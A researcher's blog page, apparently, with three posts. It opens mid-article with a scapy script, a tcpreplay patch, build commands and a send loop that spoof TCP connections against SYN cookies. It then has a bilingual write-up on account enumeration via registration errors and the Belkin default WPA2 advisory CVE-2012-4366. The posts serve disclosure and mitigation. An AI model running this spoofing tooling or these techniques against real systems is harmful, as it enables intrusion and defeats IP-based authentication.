# Change log level to suppress annoying IPv6 error
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
 
from scapy.all import *
import time
 
# Adjust MAC addresses of sender and recipient of this packet accordingly, the dst MAC 
# should be the MAC of the gateway to use when the target is not on your local subnet
ether=Ether(src="40:eb:60:9f:42:a0",dst="e8:40:f2:d1:b3:a2")
# Set up source and destination IP addresses
ip=IP(src="192.168.1.217", dst="192.168.1.11")
 
# Assemble an ACK packet with "Hello World\n" as a payload
pkt = ether/ip/TCP(sport=31337, dport=1234, flags="A", seq=43, ack=1337) / ("Hello World\n")
# Write the packet to a pcap file, which can then be sent using a patched version of tcpreplay
wrpcap("ack_with_payload.pcap",pkt)

The next step is to patch and compile tcpreplay with the following patch:

diff -u -r tcpreplay-3.4.4/src/send_packets.c tcpreplay-3.4.4.patched/src/send_packets.c
--- tcpreplay-3.4.4/src/send_packets.c	2010-04-05 02:58:02.000000000 +0200
+++ tcpreplay-3.4.4.patched/src/send_packets.c	2013-08-06 10:56:51.757048452 +0200
@@ -81,6 +81,9 @@
 void
 send_packets(pcap_t *pcap, int cache_file_idx)
 {
+    static u_int32_t ack_bruteforce_offset = 1;
+    uint32_t* ack;
+    uint32_t orig_ack;
     struct timeval last = { 0, 0 }, last_print_time = { 0, 0 }, print_delta, now;
     COUNTER packetnum = 0;
     struct pcap_pkthdr pkthdr;
@@ -154,6 +157,9 @@
 #endif
 
 #if defined TCPREPLAY &amp;&amp; defined TCPREPLAY_EDIT
+        ack = (uint32_t*)(pktdata + 14 + 20 + 8);
+        orig_ack = *ack;
+        *ack = htonl(ntohl(*ack) + ack_bruteforce_offset);
         pkthdr_ptr = &amp;pkthdr;
         if (tcpedit_packet(tcpedit, &amp;pkthdr_ptr, &amp;pktdata, sp-&gt;cache_dir) == -1) {
             errx(-1, "Error editing packet #" COUNTER_SPEC ": %s", packetnum, tcpedit_geterr(tcpedit));
@@ -176,7 +182,7 @@
         /* write packet out on network */
         if (sendpacket(sp, pktdata, pktlen) &lt; (int)pktlen)
             warnx("Unable to send packet: %s", sendpacket_geterr(sp));
-
+        *ack = orig_ack;
         /*
          * track the time of the "last packet sent".  Again, because of OpenBSD
          * we have to do a mempcy rather then assignment.
@@ -205,7 +211,7 @@
             }
         }
     } /* while */
-
+    ack_bruteforce_offset += 31337;
     if (options.enable_file_cache) {
         options.file_cache[cache_file_idx].cached = TRUE;
     }

Here are the commands needed to patch and compile it on an Ubuntu 12.04 amd64 system:

apt-get install build-essential libpcap-dev
ln -s lib/x86_64-linux-gnu /usr/lib64 # Quick workaround for a bug in the build system of tcpreplay
wget -O tcpreplay-3.4.4.tar.gz http://prdownloads.sourceforge.net/tcpreplay/tcpreplay-3.4.4.tar.gz?download
tar xzvf tcpreplay-3.4.4.tar.gz
cd tcpreplay-3.4.4
cat ../tcpreplay_patch.txt | patch -p1
./configure
make
cp src/tcpreplay-edit ../

After compiling a patched version of tcpreplay, you can use the following commands to actually send out packets in an infinite loop:

python create_packet.py
while true;do time ./tcpreplay-edit -i eth0 -t -C -K -l 500000000 -q ack_with_payload.pcap;done

VII. Experimental results

I've tested this setup in a local network between a 3 year old notebook (HP 6440b, i5-430M CPU and Marvell 88E8072 gigabit NIC) as the client and a desktop computer as the server. With a small test payload, the achievable packet rate is some 280,000 packets per seconds, which leads to some 73% CPU usage of the tcpreplay process (18% user and 55% sys in the output of time). According to [5] it may be expected that the packet rate can at least be doubled given a fast system with a decent Intel gigabit network card. Obviously the actual packet rate also depends on the size of the payload data. During a 10.5 hour overnight run I successfully spoofed 64 connections, which is about one successful spoof every 10 minutes. This is a little bit less than the expected value of 79 spoofed connections (once every 8 minutes). There are several possible explanations for this deviation:

  • The tcpreplay process takes some time to print the statistics in the end. During that time no packets are sent. I've only used the statistics output of tcpreplay for measuring the packet rate and so the measured packet rate may be a little bit off.
  • When going to the maximum packet rate achievable with your hardware, there may be packet loss (especially if you don't use any kind of congestion control).
  • Last but not least the spoofing is a statistical process. The standard deviation is approximately the square root of the expected number of spoofed connections and it is not particularly unlikely to be off by one or two standard deviations from the expected value. For this experiment the standard deviation is sqrt(79) = 8.89 and the measured number of spoofed connections was off by 1.68 standard deviations, which is well within the expected statistical variation.

VIII. Possible mitigation options

The simplification of TCP Connection Spoofing described here is an inherent problem of TCP SYN Cookies and so there won't be a simple patch which just solves the issue and makes the Spoofing Attack as hard as it is without SYN Cookies. It is only possible to gradually increase the required effort for successfully spoofing a connection e.g. by only accepting the last two instead of four counter values (which will lead to a 60-120s timeout between the initial SYN and the final ACK packet of the three-way handshake during a SYN Flooding attack) or by disallowing the combination of the final ACK packet with payload data (which will double the number of packets the attacker has to send). However, even with this two mitigation options in place, the spoofing attack is still about an order of magnitude easier with SYN Cookies than it is without SYN Cookies and it would still be very inadvisable to assume that the source IP address of TCP connections can't be spoofed. It may also be possible to use the lower bits of the TCP timestamp option (which is currently used in order to support TCP Options with SYN Cookies) for encoding the MSS and counter values. However, this can only provide effective protection against a spoofing attack if the server refuses clients which don't support TCP timestamps during a SYN Flooding Attack, which will break compatibility with some standard-conform TCP implementations.

It is obviously possible to disable SYN Cookies (and increase the backlog queue size in /proc/sys/net/ipv4/tcp_max_syn_backlog) in order to make the spoofing attack as hard as possible and force an attacker to brute force the full 32 bit ISN space. However, disabling SYN Cookies may require a significant amount of CPU Time and Memory during a SYN Flooding Attack. Moreover, the spoofing is still not impossible even without SYN Cookies and it will likely succeed within a couple of hours with a gigabit ethernet connection.

Given the limitations of the other mitigation options my suggestion is to solve the problem on a higher level and make sure that the security of applications doesn't rely on the impossible of spoofing the source address of TCP connections. This obviously means that you should never rely on source IP addresses for authentication. For web applications it is also possible to mitigate the issue by using secure CSRF tokens for all actions which cause persistent changes on the server and not processing the request unless it uses a valid CSRF token. In that case the IP address of the request using the CSRF token may be spoofed but the IP address to which the token has been sent to can't be spoofed since the attacker will need to receive the CSRF token so that he can use it. When logging IP addresses used for certain actions such as blog comments or account registrations, the IP address to which the CSRF token has been sent to should be logged additionally to (or instead of) the IP address using the token.

References:
[1]: http://lwn.net/Articles/277146/
[2]: http://cr.yp.to/syncookies.html Section "What are SYN cookies?"
[3]: http://cr.yp.to/syncookies.html Section "Blind connection forgery"
[4]: http://www.thice.nl/creating-ack-get-packets-with-scapy/
[5]: http://wiki.networksecuritytoolkit.org/nstwiki/index.php/LAN_Ethernet_Maximum_Rates,_Generation,_Capturing_%26_Monitoring#pktgen:_UDP_60_Byte_Packets

Information leakage in many websites and job application portals

German version of this post

1. Summary

Many websites such as forums, dating sites, job application portals, newsletters or social networks require a user registration. This registration generally requires an email address and a freely choosable pseudonym as username. Most Internet users assume that only the chosen pseudonym is publicly visible while the email address is treated confidential by the site operator. Depending on the type of website it is important that the existence of an account is kept confidential since knowing that an account exists may lead to certain conclusions about the account owner. As an example, if a person has registered in a forum about a specific disease, it is likely that this person is affected by this disease. The problem presented here allows unauthorized third parties to find out whether there is an account for a specific email address. In case of online job application portals, the existence of an account typically means that the account owner has applied for a job. This may allow an employer to find out that one of his employees has confidentially applied for a job at another company.

2. Description of the problem

The main problem is that if a user tries to register with an email address or a username, which is already registered at the site, the user gets a corresponding error message in the browser. An unauthorized third party may try to register with the email address or username of the potential account owner. If this results in an error message, the attacker may conclude that the email address or username is already registered.

The email address is linked to a specific person and most employers know at least one private email addresses of their employees. The problem can obviously only reveal the existence of an account on a site such as a job application portal and no more detailed information about the account (such as the corresponding pseudonym to a given email address or the application submitted). However, the bare fact that an employee has applied for another job may already have negative consequences for the existing employment.

For some sites such as job application portals the username can also be linked to a specific person (especially for rare names and/or small industries), since many applicants choose an easily predictable username such as "First Name.Last Name" or a pseudonym which is also known to the current employer and expect the data to be treated confidential by the company they apply to. If this predictable username is registered in the job application form of another company, an employer may conclude that his employee applies for a job there.

Some websites don't require a username and use the email address and password for logging in. Some other sites assign a randomly chosen username for every registered user. Most of these sites reveal the existence of an account for an email address as well when trying to register again with the email address.

3. Distribution of problem for job application portals

I have checked the job application portals of some big companies by trying to register with the same username or email address twice. 27 of the 30 companies in the DAX index (which contains the biggest stock companies in Germany) are affected by the problem. The remaining 3 companies either don't provide an online job application portal or only allow direct applications without an account registration. This leads to the conclusion that the vast majority of companies running an online job application portal are affected by the problem. Some international companies such as IBM or Intel are affected as well.

4. Other problematic online accounts

The problem not only affects job application portals but also many other websites such as online shops, forums, newsletters, social networks or dating sites. The mere existence of an account in a forum may lead to problematic conclusions about the owner of the account. An employer may for instance check whether a female applicant is registered in a forum about pregnancy with the email address used for the application instead of asking whether she is pregnant (which is illegal to ask in some countries) and not employ her if there is an account. The registration in a forum or a newsletter about a sensitive topic such as employment rights, homosexuality, certain political opinions/activities, diseases (e.g. HIV) or psychical problems should also not be revealed to everyone who knows the user's email address. Most users expect that a forum only reveals the chosen pseudonym to the public and that the email address is treated confidential. So it may be problematic if everyone, who knows the email address, can figure out that someone has an account in a forum.

5. Possible use of vulnerability by cyber criminals

The existence of an account in a forum or vendor support site about specific hardware or software components can reveal some information about the hardware/software used by the account owner. This may allow an attacker to specifically exploit vulnerabilities in those components in a targeted attack.

Cyber criminals could also exploit this problem to increase the effectivity of their attacks. For instance, a phisher may choose to only send his phishing mails to email addresses which are actually registered at a site. An attacker may also verify that an account exists before trying to break into the account by brute-forcing the password (or the security question for resetting the password).

6. Confirmation emails

Some sites send a confirmation email when trying to register with a given email address. This confirmation mails allow users to find out that someone has tried to register with the user's email address on a site.

Some sites reveal the existence of an email address/username before actually submitting the registration form e.g. using Ajax requests to the server. In this case, no confirmation email is sent to the owner of the email address. Some other sites reveals the existence of an email address when submitting the registration form even if there is another error such as an empty or weak password, a duplicate username or required form fields left blank. In these cases the sites don't send any confirmation email but still reveal the existence of an account to a given email address.

When a confirmation mail is sent, most users will just ignore it since they haven't registered on the site and not take into account that this email may be the result of someone trying to reveal the user's accounts. Even if a user knows about the problem, it may still be impossible to find out who is responsible for the attack.

7. Mitigation for website operators

Website operators can take some technical measures to mitigate the risk for their users. Depending on the nature of the site it may be necessary to abandon the possibility for users to choose a username, because a given username may have already been taken, which will make the registration fail and thus reveal the existence of a given username. For sites which already publicly reveal the chosen names as part of the site functionality (such as forums or dating sites) and most users choose a pseudonym for the registration, a freely choosable username is obviously unproblematic. For other sites such as job application portals where a confidential treatment of all user data is commonly expected and many users choose their real name as username, it is probably necessary to abandon the possibility to register with a freely choosable username. The site may either create a randomly generated username or just use the user's email address instead of a username for logging in.

The same problem also applies for email addresses. Most sites show an error message (or a hint to use the existing account) when trying to register with an already registered email address. This problem can be solved by requiring the user to verify the email address by clicking on a link sent to the user via email. If the email address is already registered, the site doesn't need to tell the client browser about the existing account. The site may then send a reminder about the existing account instead of a verification link via email. This makes sure that only the owner of the email address can find out whether there is an account for his email address.

The website operator should also make sure that the password reset functionality and changing the email address of an existing account (which an attacker can easily register for this purpose) doesn't reveal to the client browser whether a given email address is already registered at the site.

The measures proposed here may lead to some extra effort and losses of comfort (no freely choosable username, requirement to verify email address) and increased support expenditures. So there is an obvious trade-off between usability and privacy. For some sites such as job application portals, dating sites or forums about sensitive topics it is obvious that privacy should have priority over usability and the existence of an account shouldn't be revealed to unauthorized third parties.

8. Mitigation options for users

Users may also protect their privacy by using secret email addresses/aliases for registering sensitive accounts. You can easily register a new account at a freemail provider of your choice for this. However, registering too many email accounts may be problematic since it requires users to remember all email addresses/passwords and regularly check all the accounts for incoming mails. As an alternative, some email providers such as hotmail allow setting up a limited number of alias addresses for one account, so that a user can check incoming emails to multiple addresses with one single email account. Many providers also allow appending a plus sign and a random string to an email address. You can for instance use john.doe+someRandomString@email.provider instead of john.doe@email.provider when doing a confidential application to a company. Since an attacker only knows the base address (john.doe@email.provider) and can't guess the random string you appended, he can't check whether you have already registered an account. However, you should keep in mind that you will need the full email address used for the registration for doing a password reset. So it may be a good idea to write down the email alias you used for the registration.

If you have already registered at a sensitive site with a non-secret email address, you can still change your email address to an alias. Most sites allow changing the email address in the profile settings. However, some sites still block the registration of a new account with the same email address thus revealing the fact that there had been an account. You may also inform the website operator if a site you know/are using is affected by the problem and the existence of an account should be kept strictly confidential based on the nature of the website.

If you want to hide the existence of an account, you should also choose a username which is non-guessable even for someone who knows you. This is obvious for community sites such as forums or dating sites with publicly visible nicknames. However, even for sites such as job application portals where you expect your data to be treated confidential, you should still choose a non-guessable username.

Informationsleak bei vielen Webseiten und Online-Bewerbungsportalen

English version of this post

1. Zusammenfassung

Für die Nutzung vieler Webseiten wie z.B. Foren, Partnerbörsen, Bewerbungsportalen, Newslettern oder sozialen Netzwerken muss man sich als Benutzer registrieren. Für diese Registrierung ist in der Regel die Angabe einer Mailadresse sowie eines frei wählbaren Pseudonyms als Benutzername erforderlich. Die meisten Internetnutzer gehen dabei davon aus, dass lediglich das Pseudonym öffentlich sichtbar ist und die Mailadresse vom Betreiber der Seite vertraulich behandelt wird. Je nach Art der Seite sollte bereits die Existenz eines Accounts zu einer bestimmten Person/Mailadresse geheimgehalten werden, weil bereits die Existenz eines Accounts gewisse Rückschlüsse über den Accountinhaber zulässt. Eine Registrierung in einem Forum zu einer bestimmten Krankheit lässt beispielsweise den Schluss zu, dass der Accountinhaber an dieser Krankheit leidet. Durch das hier vorgestellte Problem können unbefugte Dritte bei vielen Webseiten einfach feststellen, ob zu einer bestimmten Mailadresse ein Account existiert. Im Falle eines Bewerbungsportals bedeutet die Existenz eines Accounts in der Regel, dass der Accountinhaber sich bei der Firma beworben hat. Damit kann ein Arbeitgeber herausfinden, dass sich einer seiner Mitarbeiter bei einer anderen Firma bewirbt.

2. Beschreibung des Problems

Das Problem besteht darin, dass man beim Registrieren eines Accounts eine entsprechende Fehlermeldung bekommt, wenn bereits ein Account mit der angegebenen Mailadresse oder dem gewählten Benutzernamen existiert. Ein unbefugter Dritter kann damit durch den Versuch einer Registrierung mit der Mailadresse oder dem Benutzernamen des potentiellen Accountinhabers feststellen, ob eine Mailadresse oder ein Benutzername bereits auf einer Seite registriert ist.

Die Mailadresse ist fest einer Person zugeordnet und somit kann man aus der Existenz eines Accounts zu einer Mailadresse schließen, dass der Besitzer der Mailadresse sich auf der Seite registriert hat. Ein Arbeitgeber kennt in der Regel zumindest eine private Mailadresse des Mitarbeiters und kann somit feststellen, ob sich der Mitarbeiter mit dieser Mailadresse im Bewerbungsportal einer anderen Firma registriert hat. Man kann über dieses Problem zwar keine Details über den Account wie z.B. das verwendete Pseudonym zu einer Mailadresse oder das abgeschickte Bewerbungsschreiben herausfinden. Allerdings kann allein das Offenbaren der Existenz eines Accounts im Bewerbungsportal einer konkurrierenden Firma unerwünschte Konsequenzen für das bestehende Arbeitsverhältnis des Bewerbers haben.

Für einige Seiten wie z.B. Bewerbungsportale kann der Benutzername in vielen Fällen ebenfalls fest einer bestimmten Person zugeordnet werden (insbesondere bei seltenen Namen und/oder kleinen Branchen), da viele Nutzer dort einen vorhersehbaren Namen wie z.B. "Vorname.Nachname" oder ein dem bisherigen Arbeitgeber bekanntes Pseudonym wählen und auf eine vertrauliche Behandlung der Daten vertrauen.

Manche Webseiten verzichten auf einen eigenen Benutzernamen und verwenden zum Einloggen statt dessen nur die Mailadresse und das Passwort. Bei anderen Seiten wird ein zufälliger Benutzername vom System vergeben. Bei den meisten dieser Seiten lässt sich ebenfalls durch den Versuch einer Neuregistrierung feststellen, ob eine bestimmte Mailadresse bereits registriert ist.

3. Verbreitung des Problems bei Bewerbungsportalen

Ich habe durch den Versuch einer Doppeltregistrierung mit dem gleichen Benutzernamen bzw. der gleichen Mailadresse die Bewerbungsportalen von einigen großen Firmen getestet. Von den 30 Konzernen im DAX-Aktienindex sind 27 von dem Problem betroffen. Die übrigen 3 Firmen betreiben entweder kein Bewerbungsportal oder ermöglichen nur direkte Bewerbungen ohne vorherige Registrierung eines Accounts. Daher gehe ich davon aus, dass die überwiegende Mehrheit der Firmen, die ein Online-Bewerbungsportal betreiben, von dem Problem betroffen sind. Auch die Bewerbungsportale von vielen internationale Konzerne wie z.B. IBM oder Intel sind von dem Problem betroffen.

4. Andere problematische Online-Accounts

Das Problem tritt nicht nur bei Bewerbungsportalen sondern auch bei diversen weiteren Webseiten wie z.B. Online-Shops, Foren, Newslettern, sozialen Netzwerken oder Partnerbörsen auf. Allein die Existenz eines Accounts in einem Forum lässt in einigen Fällen bereits problematische Rückschlüsse über den Accountinhaber zu. Beispielsweise könnte ein Arbeitgeber anstelle der verbotenen Frage nach einer Schwangerschaft überprüfen, ob eine Bewerberin mit der für die Bewerbung verwendeten Mailadresse in einem Forum zum Thema Schwangerschaft registriert ist und gegebenenfalls unter einem Vorwand auf eine Einstellung verzichten. Auch eine Registrierung in einem Forum zu einem sensitiven Thema wie z.B. Arbeitnehmerrechte, Homosexualität, bestimmten politischen/weltanschaulichen Ansichten/Aktivitäten, Krankheiten (z.B. HIV) oder psychischen Problemen sollte nicht für jeden sichtbar sein. Die meisten Nutzer gehen davon aus, dass die Mailadresse vom Betreiber des Forums vertraulich behandelt wird und nur ein frei wählbares Pseudonym öffentlich sichtbar ist. Daher kann es höchst problematisch sein, wenn jeder, der die Mailadresse kennt, eine Mitgliedschaft in einem derartigen Forum feststellen kann.

5. Möglicher Missbrauch durch Cyberkriminelle

Die Existenz eines Accounts in einem Forum oder einem Supportportal zu bestimmten Hardware- oder Softwarekomponenten kann einem Angreifer verraten, dass ein Benutzer bestimmte Hardware/Software benutzt. Damit kann ein Angreifer gezielt Sicherheitslücken in diesen Komponenten ausnutzen.

Cyberkriminelle könnten das Problem verwenden, um die Effektivität ihrer Angriffe zu steigern. Beispielsweise ist es möglich, Phishing-Mails gezielt nur an die Mailadressen zu schicken, die auf der jeweiligen Seite tatsächlich registriert sind. Beim Versuch einer Accountübernahme durch Ausprobieren des Passworts (oder der Sicherheitsfrage zum Zurücksetzen des Passworts) kann es für einen Angreifer ebenfalls sinnvoll sein, vorher zu überprüfen, ob zu einem bestimmten Benutzernamen oder einer Mailadresse tatsächlich ein Account existiert.

6. Bestätigungsmails

Manche Seiten schicken beim Versuch einer Registrierung eine Bestätigungsmail an die angegebene Mailadresse. Über diese Bestätigungsmail kann der Nutzer erkennen, dass jemand versucht hat, sich mit der Mailadresse des Nutzers zu registrieren.

Einige Seiten zeigen (beispielsweise durch eine entsprechende Ajax-Anfrage an den Server) bereits vor Abschicken des Registrierungsformulars an, ob eine Mailadresse oder ein Benutzername bereits registriert ist. In diesem Fall wird keine Bestätigungsmail an den Besitzer der Mailadresse geschickt. Andere Seiten weisen nach dem Abschicken des Registrierungsformulars auf die bereits vergebene Mailadresse hin, auch wenn die Registrierung bereits aus anderen Gründen wie z.B. einem fehlenden Passwort, einem bereits vergebenen Benutzernamen oder nicht ausgefüllten Pflichtfeldern scheitert. In diesem Fall wird ebenfalls keine Bestätigungsmail verchickt und ein Angreifer kann dennoch feststellen, ob eine Mailadresse auf der Seite registriert ist.

Selbst wenn eine Bestätigungsmail verschickt wird, wird diese von den meisten Nutzern ignoriert, da sie sich nicht selbst registriert haben und kommen nicht auf die Idee, dass jemand versuchen könnte, mit der Mailadresse registrierte Online-Accounts zu finden. Und selbst wenn ein Benutzer das Problem kennt, kann es schwierig oder unmöglich sein, den Verantwortlichen für den Angriff zu finden.

7. Lösungsmöglichkeiten für Seitenbetreiber

Technisch lässt sich das Problem durch eine entsprechende Anpassung der betroffenen Webseiten lösen. Je nach Art der Seite muss man dazu auf einen frei wählbaren Benutzernamen verzichten, weil dieser ja schon vergeben sein kann und dies zwangsläufig zu einer Fehlermeldung beim Versuch einer Neuregistrierung mit dem selben Benutzernamen führt. Bei Seiten, auf denen der gewählte Benutzername/Nickname sowieso öffentlich sichtbar ist (z.B. Foren oder Partnerbörsen) und sich die meisten Nutzer mit einem Pseudonym registrieren, ist dies natürlich unproblematisch. Bei anderen Seiten wie z.B. Bewerbungsportalen, auf denen eine vertrauliche Behandlung der Daten allgemein erwartet wird und viele Benutzer sich nicht mit einem Pseudonym sondern mit dem richtigen Namen registrieren, ist wahrscheinlich ein Verzicht auf einen frei wählbaren Benutzernamen notwendig. Statt dessen kann man entweder einen zufälligen Namen vergeben oder ganz auf den Benutzernamen verzichten und die Mailadresse als Benutzername verwenden.

Das selbe Problem tritt auch bei der Mailadresse auf. Wenn man versucht, sich mit einer bereits registrierten Mailadresse erneut zu registrieren, dann bekommt man bei den meisten Webseiten ebenfalls eine Fehlermeldung bzw. die Aufforderung, sich mit dem bestehenden Account einzuloggen. Als Lösung für dieses Problem könnte man eine Verifizierung der Mailadresse durch einen Bestätigungslink einführen. Falls die Mailadresse bereits registriert ist, dann kann man auf eine Fehlermeldung gegenüber dem anfragenden Webbrowser verzichten und statt der Bestätigungsmail eine Erinnerung an den bestehenden Account verschicken. Auf diese Weise kann nur der Besitzer der Mailadresse feststellen, ob es zu der Mailadresse bereits einen Account gibt.

Auch bei der "Passwort Zurücksetzen" Funktion sowie beim Ändern der Mailadresse zu einem bestehenden Account (den der Angreifer zu diesem Zweck leicht registrieren kann) muss sichergestellt werden, dass man aus dem Verhalten der Seite keine Rückschlüsse auf die Existenz einer bestimmten Mailadresse ziehen kann.

Die hier vorgeschlagenen Maßnahmen sind allerdings mit einem gewissen Zusatzaufwand verbunden und führen unter Umständen zu Einbußen beim Komfort (kein selbst gewählter Benutzername, Verifizierungslink für Mailadresse) sowie erhöhtem Supportaufwand. Daher besteht natürlich ein gewisser Konflikt zwischen der Benutzerfreundlichkeit und dem Schutz der Privatsphäre. Für einige Seiten wie z.B. Bewerbugsportale, Partnerbörsen oder Foren über bestimmte Themen ist jedoch offensichtlich, dass die Privatsphäre der Benutzer geschützt werden muss und die Seite nicht unbefugten Dritten die Existenz von Accounts verraten sollte.

8. Schutzmöglichkeiten für Benutzer

Benutzer können ebenfalls durch bestimmte Maßnahmen ihre Privatspähre schützen. Beispielsweise kann man für die Registrierung sensitiver Accounts eine neue Mailadresse bei einem Freemail-Provider registrieren. Allerdings ist das Registrieren und Verwalten von vielen Mailaccounts problematisch, weil man sich alle Mailadressen und Passwörter merken muss sowie regemäßig eingehende Mails von allen Accounts abrufen muss. Als Alternative kann man bei einigen Mailprovidern wie z.B. Hotmail eine begrenzte Zahl von Alias-Adressen für einen Account erzeugen und dadurch mit einem einzigen Account mehrere Mailadressen benutzen. Zusätzlich ermöglichen es viele Provider, an die Mailadresse ein "+" und einen weiteren String anzuhängen. Beispielsweise kann man für die Registrierung eines Accounts die Adresse john.doe+someRandomString@email.provider anstelle von john.doe@email.provider verwenden. Da ein Angreifer nur die Basisadresse (john.doe@email.provider) und nicht den zufälligen String danach kennt, kann er nicht feststellen, ob der Benutzer einen Account registriert hat. Allerdings sollte man dann bereits beim Anlegen des Accounts berücksichtigen, dass man für ein eventuell nötiges Passwort-Reset die volle Mailadresse benötigt, mit der man sich registriert hat. Daher ist es sinnvoll, sich bei der Registrierung eines Accounts die verwendete Mailadresse aufzuschreiben.

Wenn man bereits einen sensitiven Account mit einer nicht geheimen Mailadresse registriert hat, dann kann man bei vielen Seiten die Mailadresse in den Profileinstellungen nachträglich ändern oder den Account löschen und damit die Existenz des Accounts verschleiern. Allerdings blockieren manche Seiten auch nach einer Änderung der Mailadresse weiterhin die Neuregistrierung mit der alten Mailadresse und offenbaren somit die Tatsache, dass ein Account zu der Mailadresse existiert oder existiert hat.

Außerdem kann man als Benutzer betroffene Seitenbetreiber informieren, wenn die Existenz eines Accounts aufgrund der Art bzw. des Themas der Seite unbedingt vertraulich bleiben sollte.

Wenn man die Existenz eines Accounts verbergen will, dann sollte man natürlich einen Benutzernamen wählen, der (auch von Bekannten oder dem Arbeitgeber) nicht einfach erraten werden kann. Dies ist offensichtlich für Seiten mit öffentlich sichtbaren Benutzernamen/Nicks (z.B. Foren oder Partnerbörsen). Aufgrund des hier beschriebenen Problems sollte man jedoch auch bei Seiten wie Bewerbungsportalen, auf denen man eine vertrauliche Behandlung der Daten erwartet, einen nichterratbaren Benutzernamen verwenden.

CVE-2012-4366: Insecure default WPA2 passphrase in multiple Belkin wireless routers

I. Background

Belkin ships many wireless routers with an encrypted wireless network configured by default. The network name (ESSID) and the (seemingly random) password is printed on a label at the bottom of the device.

II. Description of vulnerability

Having a preconfigured randomly generated WPA2-PSK passphrase for wireless routers is basically a good idea since a vendor-generated passphrase can be much more secure than most user-generated passwords. However, in the case of Belkin the default password is calculated solely based on the mac address of the device. Since the mac address is broadcasted with the beacon frames sent out by the device, a wireless attacker can calculate the default passphrase and then connect to the wireless network.

Each of the eight characters of the default passphrase are created by substituting a corresponding hex-digit of the wan mac address using a static substitution table. Since the wan mac address is the wlan mac address + one or two (depending on the model), a wireless attacker can easily guess the wan mac address of the device and thus calculate the default WPA2 passphrase.

Moreover, the default WPA2-PSK passphrase solely consists of 8 hexadecimal digits, which means that the entropy is limited to only 32 bits (or 33 bits since some models use uppercase hex digits). After sniffing one successful association of a client to the wireless network, an attacker can carry out an offline brute-force attack to crack the password. The program oclhashcat-plus can try 131,000 passwords per second on one high end GPU (AMD Radeon hd7970) [1]. Doing a full search of the 32-bit key space takes about 9 hours at this rate.

III. Impact

An attacker can exploit this vulnerability to calculate the WPA2-PSK passphrase of a wireless network. This allows sniffing and decrypting all wireless traffic in a purely passive attack given that the attacker has also sniffed the association.

The attacker may also connect to the wireless network, which may allow further exploitation of unprotected systems in the local network. An attacker may furthermore use the wireless network to access the internet from the owner's network. The network owner may then be held responsible for any illegal activities perpetrated by the unauthorized users.

IV. Affected devices

Belkin Surf N150 Model F7D1301v1

The official Belkin support page [2] contains pictures of the label of several other WiFi devices, which show that the following devices are vulnerable as well:

Belkin N900 Model F9K1104v1
Belkin N450 Model F9K1105V2

The following device uses a variation of the algorithm and the password consists of uppercase hex digits. When using our algorithm with the wlan mac of the device, the first 5 digits of the password are calculated correctly. It is likely that the algorithm differs only in the tables used.

Belkin N300 Model F7D2301v1

It is likely that other Belkin devices are affected as well. Unfortunately, Belkin has not yet cooperated with us to fix the vulnerability and/or confirm a list of other affected devices. If you own a Belkin wireless router and want to know whether it is vulnerable as well, you should change the passphrase and then send me the relevant data (model number, wan/wlan mac address and original, default WPA2 passphrase).

V. Solution

Users of potentially affected wireless routers should change the wireless passphrase to something more secure.

VI. Timeline

6.1.2012: Vendor contacted
27.1.2012: Escalated
29.10.2012: Another contact attempt, still no response
19.11.2012: Public disclosure

VII. Credits

Jakob Lell
Jörg Schneider

VIII. References

Advisory location: http://www.jakoblell.com/blog/?p=15

CVE-2012-4366

[1] http://hashcat.net/oclhashcat-plus/
[2] http://en-us-support.belkin.com/app/answers/detail/a_id/6989